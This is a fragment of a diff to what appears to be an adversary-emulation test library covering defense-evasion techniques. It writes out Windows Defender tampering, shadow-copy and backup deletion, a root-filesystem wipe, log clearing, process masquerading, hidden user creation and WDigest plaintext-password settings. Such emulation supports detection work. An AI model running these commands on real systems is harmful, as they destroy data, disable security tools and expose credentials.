Defender ATP PowerShell description: 'Attempting to disable scheduled scanning and other parts of windows defender atp - ' +' supported_platforms: - windows executor: @@ -7248,7 +7248,7 @@ defense-evasion: description: 'Attempting to disable scheduled scanning and other parts of windows defender atp - ' +' supported_platforms: - windows executor: @@ -7264,7 +7264,7 @@ defense-evasion: - name: Tamper with Windows Defender Registry description: 'Disable Windows Defender from starting after a reboot - ' +' supported_platforms: - windows executor: @@ -7273,11 +7273,11 @@ defense-evasion: command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 - ' +' cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 - ' +' - name: Disable Microft Office Security Features description: | Gorgon group may disable Office security features so that their code can run @@ -7311,7 +7311,7 @@ defense-evasion: command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All - ' +' T1107: technique: x_mitre_data_sources: @@ -7367,7 +7367,7 @@ defense-evasion: - name: Delete a single file - Linux/macOS description: 'Delete a single file from the temporary directory - ' +' supported_platforms: - linux - macos @@ -7380,12 +7380,12 @@ defense-evasion: name: sh command: 'rm -f #{file_to_delete} - ' +' - name: Delete an entire folder - Linux/macOS description: 'Recursively delete the temporary directory and all files contained within it - ' +' supported_platforms: - linux - macos @@ -7398,12 +7398,12 @@ defense-evasion: name: sh command: 'rm -rf #{folder_to_delete} - ' +' - name: Overwrite and delete a file with shred description: 'Use the `shred` command to overwrite the temporary file and then delete it - ' +' supported_platforms: - linux input_arguments: @@ -7415,11 +7415,11 @@ defense-evasion: name: sh command: 'shred -u #{file_to_shred} - ' +' - name: Delete a single file - Windows cmd description: 'Delete a single file from the temporary directory using cmd.exe - ' +' supported_platforms: - windows executor: @@ -7432,7 +7432,7 @@ defense-evasion: description: 'Recursively delete the temporary directory and all files contained within it using cmd.exe - ' +' supported_platforms: - windows executor: @@ -7444,7 +7444,7 @@ defense-evasion: - name: Delete a single file - Windows PowerShell description: 'Delete a single file from the temporary directory using Powershell - ' +' supported_platforms: - windows executor: @@ -7457,7 +7457,7 @@ defense-evasion: description: 'Recursively delete the temporary directory and all files contained within it using Powershell - ' +' supported_platforms: - windows input_arguments: @@ -7474,7 +7474,7 @@ defense-evasion: - name: Delete VSS - vssadmin description: 'Delete all volume shadow copies with vssadmin.exe - ' +' supported_platforms: - windows executor: @@ -7482,11 +7482,11 @@ defense-evasion: elevation_required: true command: 'vssadmin.exe Delete Shadows /All /Quiet - ' +' - name: Delete VSS - wmic description: 'Delete all volume shadow copies with wmic - ' +' supported_platforms: - windows executor: @@ -7494,11 +7494,11 @@ defense-evasion: elevation_required: true command: 'wmic shadowcopy delete - ' +' - name: bcdedit description: 'This test leverages `bcdedit` to remove boot-time recovery measures. - ' +' supported_platforms: - windows executor: @@ -7510,7 +7510,7 @@ defense-evasion: - name: wbadmin description: 'This test deletes Windows Backup catalogs. - ' +' supported_platforms: - windows executor: @@ -7518,25 +7518,25 @@ defense-evasion: elevation_required: true command: 'wbadmin delete catalog -quiet - ' +' - name: Delete Filesystem - Linux description: 'This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. - ' +' supported_platforms: - linux executor: name: bash command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null - ' +' - name: Delete-PrefetchFile description: 'Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. - ' +' supported_platforms: - windows executor: @@ -7545,7 +7545,7 @@ defense-evasion: command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) - ' +' - name: Delete TeamViewer Log Files description: | Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration. @@ -7664,7 +7664,7 @@ defense-evasion: description: 'Modifies the filesystem permissions of the specified file or folder to take ownership of the object. - ' +' supported_platforms: - windows input_arguments: @@ -7676,12 +7676,12 @@ defense-evasion: name: command_prompt command: 'takeown.exe /f #{file_folder_to_own} - ' +' - name: Take ownership recursively using takeown utility description: 'Modifies the filesystem permissions of the specified folder to take ownership of it and its contents. - ' +' supported_platforms: - windows input_arguments: @@ -7693,12 +7693,12 @@ defense-evasion: name: command_prompt command: 'takeown.exe /f #{folder_to_own} /r - ' +' - name: cacls - Grant permission to specified user or group description: 'Modifies the filesystem permissions of the specified file or folder to allow the specified user or group Full Control. - ' +' supported_platforms: - windows input_arguments: @@ -7714,12 +7714,12 @@ defense-evasion: name: command_prompt command: 'cacls.exe #{file_or_folder} /grant #{user_or_group}:F - ' +' - name: cacls - Grant permission to specified user or group recursively description: 'Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. - ' +' supported_platforms: - windows input_arguments: @@ -7735,12 +7735,12 @@ defense-evasion: name: command_prompt command: 'cacls.exe #{file_or_folder} /grant #{user_or_group}:F /t - ' +' - name: icacls - Grant permission to specified user or group description: 'Modifies the filesystem permissions of the specified file or folder to allow the specified user or group Full Control. - ' +' supported_platforms: - windows input_arguments: @@ -7756,12 +7756,12 @@ defense-evasion: name: command_prompt command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F - ' +' - name: icacls - Grant permission to specified user or group recursively description: 'Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. - ' +' supported_platforms: - windows input_arguments: @@ -7777,12 +7777,12 @@ defense-evasion: name: command_prompt command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F /t - ' +' - name: attrib - Remove read-only attribute description: 'Removes the read-only attribute from a file or folder using the attrib.exe command. - ' +' supported_platforms: - windows input_arguments: @@ -7794,12 +7794,12 @@ defense-evasion: name: command_prompt command: 'attrib.exe -r #{file_or_folder} - ' +' - name: chmod - Change file or folder mode (numeric mode) description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux @@ -7816,12 +7816,12 @@ defense-evasion: name: bash command: 'chmod #{numeric_mode} #{file_or_folder} - ' +' - name: chmod - Change file or folder mode (symbolic mode) description: 'Changes a file or folder''s permissions using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux @@ -7838,12 +7838,12 @@ defense-evasion: name: bash command: 'chmod #{symbolic_mode} #{file_or_folder} - ' +' - name: chmod - Change file or folder mode (numeric mode) recursively description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux @@ -7860,12 +7860,12 @@ defense-evasion: name: bash command: 'chmod #{numeric_mode} #{file_or_folder} -R - ' +' - name: chmod - Change file or folder mode (symbolic mode) recursively description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux @@ -7882,12 +7882,12 @@ defense-evasion: name: bash command: 'chmod #{symbolic_mode} #{file_or_folder} -R - ' +' - name: chown - Change file or folder ownership and group description: 'Changes a file or folder''s ownership and group information using chown. - ' +' supported_platforms: - macos - linux @@ -7908,12 +7908,12 @@ defense-evasion: name: bash command: 'chown #{owner}:#{group} #{file_or_folder} - ' +' - name: chown - Change file or folder ownership and group recursively description: 'Changes a file or folder''s ownership and group information recursively using chown. - ' +' supported_platforms: - macos - linux @@ -7934,11 +7934,11 @@ defense-evasion: name: bash command: 'chown #{owner}:#{group} #{file_or_folder} -R - ' +' - name: chown - Change file or folder mode ownership only description: 'Changes a file or folder''s ownership only using chown. - ' +' supported_platforms: - macos - linux @@ -7955,11 +7955,11 @@ defense-evasion: name: bash command: 'chown #{owner} #{file_or_folder} - ' +' - name: chown - Change file or folder ownership recursively description: 'Changes a file or folder''s ownership only recursively using chown. - ' +' supported_platforms: - macos - linux @@ -7976,7 +7976,7 @@ defense-evasion: name: bash command: 'chown #{owner} #{file_or_folder} -R - ' +' - name: chattr - Remove immutable file attribute description: | Remove's a file's `immutable` attribute using `chattr`. @@ -7993,7 +7993,7 @@ defense-evasion: name: sh command: 'chattr -i #{file_to_modify} - ' +' T1144: technique: x_mitre_permissions_required: @@ -8072,7 +8072,7 @@ defense-evasion: - name: Gatekeeper Bypass description: 'Gatekeeper Bypass via command line - ' +' supported_platforms: - macos input_arguments: @@ -8136,7 +8136,7 @@ defense-evasion: - name: Disable history collection description: 'Disables history collection in shells - ' +' supported_platforms: - linux - macos @@ -8231,7 +8231,7 @@ defense-evasion: - name: Create a hidden file in a hidden directory description: 'Creates a hidden file inside a hidden directory - ' +' supported_platforms: - linux - macos @@ -8243,11 +8243,11 @@ defense-evasion: echo "T1158" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ - ' +' - name: Mac Hidden file description: 'Hide a file on MacOS - ' +' supported_platforms: - macos executor: @@ -8256,12 +8256,12 @@ defense-evasion: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" - ' +' - name: Create Windows System File with Attrib description: 'Creates a file and marks it as a system file using the attrib.exe utility. - ' +' supported_platforms: - windows executor: @@ -8272,11 +8272,11 @@ defense-evasion: attrib.exe +s %TEMP%\T1158.txt cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1 - ' +' - name: Create Windows Hidden File with Attrib description: 'Creates a file and marks it as hidden using the attrib.exe utility. - ' +' supported_platforms: - windows executor: @@ -8287,11 +8287,11 @@ defense-evasion: attrib.exe +h %TEMP%\T1158_hidden.txt cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1 - ' +' - name: Hidden files description: 'Requires Apple Dev Tools - ' +' supported_platforms: - macos input_arguments: @@ -8304,11 +8304,11 @@ defense-evasion: elevation_required: false command: 'setfile -a V #{filename} - ' +' - name: Hide a Directory description: 'Hide a directory on MacOS - ' +' supported_platforms: - macos executor: @@ -8319,11 +8319,11 @@ defense-evasion: chflags hidden /var/tmp/T1158_mac.txt cleanup_command: 'rm /var/tmp/T1158_mac.txt - ' +' - name: Show all hidden files description: 'Show all hidden files on MacOS - ' +' supported_platforms: - macos executor: @@ -8331,15 +8331,15 @@ defense-evasion: elevation_required: false command: 'defaults write com.apple.finder AppleShowAllFiles YES - ' +' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO - ' +' - name: Create ADS command prompt description: 'Create an Alternate Data Stream with the command prompt. Write access is required. - ' +' supported_platforms: - windows input_arguments: @@ -8357,15 +8357,15 @@ defense-evasion: command: | echo "Normal Text." > #{file_name} echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename} - for /f "usebackq delims=╧å" %i in (#{file_name}:#{ads_filename}) do %i + for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 - ' +' - name: Create ADS PowerShell description: 'Create an Alternate Data Stream with PowerShell. Write access is required. - ' +' supported_platforms: - windows input_arguments: @@ -8387,7 +8387,7 @@ defense-evasion: ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore - ' +' T1147: technique: x_mitre_data_sources: @@ -8435,7 +8435,7 @@ defense-evasion: - name: Hidden Users description: 'Add a hidden user on MacOS - ' +' supported_platforms: - macos input_arguments: @@ -8447,7 +8447,7 @@ defense-evasion: name: sh command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333 - ' +' T1143: technique: x_mitre_permissions_required: @@ -8507,7 +8507,7 @@ defense-evasion: description: 'Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden. - ' +' supported_platforms: - windows input_arguments: @@ -8524,7 +8524,7 @@ defense-evasion: elevation_required: false command: 'Start-Process #{powershell_command} - ' +' T1183: technique: x_mitre_data_sources: @@ -8614,7 +8614,7 @@ defense-evasion: - name: IFEO Add Debugger description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -8632,15 +8632,15 @@ defense-evasion: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f - ' +' - name: IFEO Global Flags description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -8744,7 +8744,7 @@ defense-evasion: - name: Clear Logs description: 'Clear Windows Event Logs - ' +' supported_platforms: - windows input_arguments: @@ -8757,12 +8757,12 @@ defense-evasion: elevation_required: true command: 'wevtutil cl #{log_name} - ' +' - name: FSUtil description: 'Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. - ' +' supported_platforms: - windows executor: @@ -8770,11 +8770,11 @@ defense-evasion: elevation_required: true command: 'fsutil usn deletejournal /D C: - ' +' - name: rm -rf description: 'Delete system and audit logs - ' +' supported_platforms: - macos - linux @@ -8788,7 +8788,7 @@ defense-evasion: This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -8800,12 +8800,12 @@ defense-evasion: name: bash command: 'echo 0> /var/spool/mail/#{username} - ' +' - name: Overwrite Linux Log description: 'This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -8817,12 +8817,12 @@ defense-evasion: name: bash command: 'echo 0> #{log_path} - ' +' - name: Delete System Logs Using PowerShell description: 'Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments - ' +' supported_platforms: - windows executor: @@ -8834,11 +8834,11 @@ defense-evasion: Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx cleanup_command: 'Start-Service -Name EventLog - ' +' - name: Delete System Logs Using Clear-EventLogId description: 'Clear event logs using built-in PowerShell commands - ' +' supported_platforms: - windows executor: @@ -8846,7 +8846,7 @@ defense-evasion: elevation_required: true command: 'Clear-EventLog -logname Application - ' +' T1202: technique: x_mitre_data_sources: @@ -9042,7 +9042,7 @@ defense-evasion: - name: Install root CA on CentOS/RHEL description: 'Creates a root CA with openssl - ' +' supported_platforms: - linux input_arguments: @@ -9124,7 +9124,7 @@ defense-evasion: description: 'Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. - ' +' supported_platforms: - windows input_arguments: @@ -9190,7 +9190,7 @@ defense-evasion: description: 'Executes the InstallHelper class constructor runner instead of executing InstallUtil. - ' +' supported_platforms: - windows input_arguments: @@ -9257,7 +9257,7 @@ defense-evasion: - name: InstallUtil class constructor method call description: 'Executes the installer assembly class constructor. - ' +' supported_platforms: - windows input_arguments: @@ -9324,7 +9324,7 @@ defense-evasion: - name: InstallUtil Install method call description: 'Executes the Install Method - ' +' supported_platforms: - windows input_arguments: @@ -9391,7 +9391,7 @@ defense-evasion: - name: InstallUtil Uninstall method call - /U variant description: 'Executes the Uninstall Method - ' +' supported_platforms: - windows input_arguments: @@ -9459,7 +9459,7 @@ defense-evasion: variant description: 'Executes the Uninstall Method - ' +' supported_platforms: - windows input_arguments: @@ -9526,7 +9526,7 @@ defense-evasion: - name: InstallUtil HelpText method call description: 'Executes the Uninstall Method - ' +' supported_platforms: - windows input_arguments: @@ -9594,7 +9594,7 @@ defense-evasion: description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. - ' +' supported_platforms: - windows input_arguments: @@ -9711,14 +9711,14 @@ defense-evasion: - name: Launchctl description: 'Utilize launchctl - ' +' supported_platforms: - macos executor: name: sh command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator - ' +' T1036: technique: x_mitre_data_sources: @@ -9833,7 +9833,7 @@ defense-evasion: description: 'Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. - ' +' supported_platforms: - windows executor: @@ -9844,12 +9844,12 @@ defense-evasion: cmd.exe /c %SystemRoot%\Temp\lsass.exe cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 - ' +' - name: Masquerading as Linux crond process. description: 'Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon. - ' +' supported_platforms: - linux executor: @@ -9862,7 +9862,7 @@ defense-evasion: description: 'Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. - ' +' supported_platforms: - windows executor: @@ -9873,12 +9873,12 @@ defense-evasion: cmd.exe /c %APPDATA%\notepad.exe /B cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1 - ' +' - name: Masquerading - wscript.exe running as svchost.exe description: 'Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe. - ' +' supported_platforms: - windows executor: @@ -9889,12 +9889,12 @@ defense-evasion: cmd.exe /c %APPDATA%\svchost.exe /B cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 - ' +' - name: Masquerading - powershell.exe running as taskhostw.exe description: 'Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. - ' +' supported_platforms: - windows executor: @@ -9905,12 +9905,12 @@ defense-evasion: cmd.exe /K %APPDATA%\taskhostw.exe cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 - ' +' - name: Masquerading - non-windows exe running as windows exe description: 'Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe - ' +' supported_platforms: - windows input_arguments: @@ -9938,12 +9938,12 @@ defense-evasion: Stop-Process -ID $myT1036 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' - name: Masquerading - windows exe running as different windows exe description: 'Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe - ' +' supported_platforms: - windows input_arguments: @@ -9964,7 +9964,7 @@ defense-evasion: Stop-Process -ID $myT1036 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' - name: Malicious process Masquerading as LSM.exe description: | Detect LSM running from an incorrect directory and an incorrect service account @@ -10066,7 +10066,7 @@ defense-evasion: description: 'Modify the registry of the currently logged in user using reg.exe cia cmd console - ' +' supported_platforms: - windows executor: @@ -10075,11 +10075,11 @@ defense-evasion: command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f - ' +' cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f - ' +' - name: Modify Registry of Local Machine - cmd description: | Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when @@ -10092,16 +10092,16 @@ defense-evasion: command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f - ' +' cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f - ' +' - name: Modify Registry of Another User Profile description: 'Modify a registry key of each user profile not currently loaded on the machine using both powershell and cmd line tools. - ' +' supported_platforms: - windows executor: @@ -10164,7 +10164,7 @@ defense-evasion: description: 'Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping) - ' +' supported_platforms: - windows executor: @@ -10173,16 +10173,16 @@ defense-evasion: command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f - ' +' cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f - ' +' - name: Modify registry to store PowerShell code description: 'Sets Windows Registry key containing base64-encoded PowerShell code. - ' +' supported_platforms: - windows input_arguments: @@ -10210,7 +10210,7 @@ defense-evasion: cleanup_command: 'Remove-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -ErrorAction Ignore - ' +' - name: Add domain to Trusted sites Zone description: | Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365 as described here: @@ -10233,7 +10233,7 @@ defense-evasion: - name: Javascript in registry description: 'placing javascript in registry for persistence - ' +' supported_platforms: - windows executor: @@ -10242,7 +10242,7 @@ defense-evasion: command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "